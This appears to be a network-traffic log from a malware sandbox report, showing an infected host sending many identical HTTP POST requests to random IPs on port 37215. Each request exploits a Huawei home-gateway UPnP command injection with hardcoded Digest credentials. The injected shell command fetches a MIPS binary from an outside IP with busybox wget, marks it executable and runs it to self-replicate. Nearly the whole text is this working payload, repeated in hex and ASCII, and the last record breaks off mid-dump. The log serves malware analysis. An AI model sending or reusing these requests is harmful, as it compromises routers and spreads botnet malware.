                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2080192.168.2.133462241.158.80.9637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.579224110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2081192.168.2.134366241.16.191.13837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.579323053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2082192.168.2.135942841.35.209.11437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.579380035 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2083192.168.2.13440302.199.10.5637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.579411030 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2084192.168.2.1352936197.227.242.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.579412937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2085192.168.2.1348266128.105.117.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.579498053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2086192.168.2.1351772157.206.136.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.579523087 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2087192.168.2.1356230197.68.125.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.579535961 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2088192.168.2.1333926157.55.184.11737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.579545975 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2089192.168.2.1348042197.37.240.12837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.579624891 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 